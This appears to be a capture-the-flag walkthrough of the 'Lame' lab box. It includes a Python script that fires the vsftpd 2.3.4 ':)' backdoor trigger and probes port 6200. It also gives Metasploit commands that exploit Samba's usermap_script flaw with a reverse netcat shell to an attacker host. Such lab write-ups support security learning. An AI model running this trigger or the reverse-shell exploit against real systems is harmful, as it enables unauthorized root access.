So we begin, as always, with our initial nmap scan.
$ nmap -sC -sV -p- -oA nmap/initial 10.10.10.3
First look shows that there is an FTP service running which allows anonymous login, so let's take a peek and see what we can find.
Which unfortunately appears to be nothing :(
However, the nmap scan revealed that the FTP software running is vsftpd 2.3.4, and a quick searchsploit shows that this version has a backdoor command execution vulnerability. Let's see if we can take advantage of this.
Looking at further information about this exploit shows it is a metasploit module, so let's fire up msfconsole and give it a whirl.
Lame indeed. The module fails, and that tells us less than it seems: the vsftpd 2.3.4 backdoor only exists in the trojaned build, and when it does fire it opens a root shell on port 6200 rather than on the FTP connection itself. So either this binary isn't the backdoored one, or the backdoor ran but port 6200 isn't reachable from us. Either way it's a dead end here, so let's go back to our nmap scan and look for other attack vectors.
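To tell those two failure modes apart, here is a small probe I added for this writeup (not from the original post or from the Metasploit module): it sends the documented trigger for the backdoor, a USER containing ":)" followed by any PASS, then classifies port 6200 as open, refused or silently dropped. The target address defaults to the box IP from the scan; the timeouts are my own choices.

```python
import socket
import time

BACKDOOR_PORT = 6200  # the trojaned vsftpd 2.3.4 spawns its root shell here


def trigger_backdoor(host, port=21, timeout=5.0):
    """Send the trigger: a USER containing ':)' followed by any PASS.

    Returns the server banner so the caller can confirm the version string.
    A backdoored build typically never answers the PASS because it is busy
    forking the listener, so a timeout there is expected, not an error.
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = s.recv(1024).decode(errors="replace").strip()
        s.sendall(b"USER probe:)\r\n")
        s.recv(1024)  # "331 Please specify the password."
        s.sendall(b"PASS anything\r\n")
        try:
            s.recv(1024)
        except socket.timeout:
            pass
    return banner


def probe_port(host, port=BACKDOOR_PORT, timeout=3.0):
    """Classify a TCP port: 'open', 'closed' (RST received) or 'filtered' (no reply)."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return "open"
    except ConnectionRefusedError:
        return "closed"
    except (socket.timeout, OSError):
        return "filtered"


def interpret(state):
    """What each result on port 6200 means for the backdoor attempt."""
    return {
        "open": "shell listening on 6200: connect with nc and you are root",
        "closed": "6200 actively refused: this vsftpd is not the trojaned build (or the trigger did not fire)",
        "filtered": "6200 silently dropped: the backdoor may have fired, but a firewall blocks the port",
    }[state]


if __name__ == "__main__":
    import sys

    target = sys.argv[1] if len(sys.argv) > 1 else "10.10.10.3"
    before = probe_port(target)
    print("banner:", trigger_backdoor(target))
    time.sleep(2)  # give the backdoor a moment to bind
    after = probe_port(target)
    print(f"6200 before trigger: {before}, after trigger: {after}")
    print(interpret(after))
```

A "closed" result after the trigger means there is nothing listening, i.e. no backdoor; "filtered" is the interesting case, because it is consistent with the backdoor having fired behind a firewall, which is exactly the situation a failed Metasploit run cannot distinguish.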
Our next likely candidate for attack presents itself, as the ports for Samba are open. These are always good to have a poke at given the history of security issues that have come up with Samba over the years.
Nmap has a number of scripts we can run to check for Samba vulnerabilities, so that's what we will try first.
$ nmap --script "smb-vuln*" --script-args=unsafe=1 -p 445 10.10.10.3
Unfortunately this also fails to find anything. That is not surprising in hindsight: the smb-vuln scripts check for specific Windows SMB-stack bugs (MS08-067, MS17-010 and friends), not for flaws in Samba itself. However, taking the version number of Samba from our initial nmap scan (3.0.20), we can run searchsploit, which does present us with another likely candidate.
The second entry is a remote heap overflow, so unlikely to help us here, but the first one looks more promising. It is the "username map script" command execution bug (CVE-2007-2447): when that option is set in smb.conf, Samba 3.0.20 through 3.0.25rc3 passes the username from a session setup to the script via the shell without escaping it, so shell metacharacters in the username get executed. It's another metasploit module, so let's fire up msfconsole again and give it a go.
We run the following:
> use exploit/multi/samba/usermap_script
> set rhost 10.10.10.3
> set payload cmd/unix/reverse_netcat
> set lhost 10.10.14.15
> exploit
And straight away we get a root shell, since smbd runs the map script with its own root privileges, along with access to both flags :)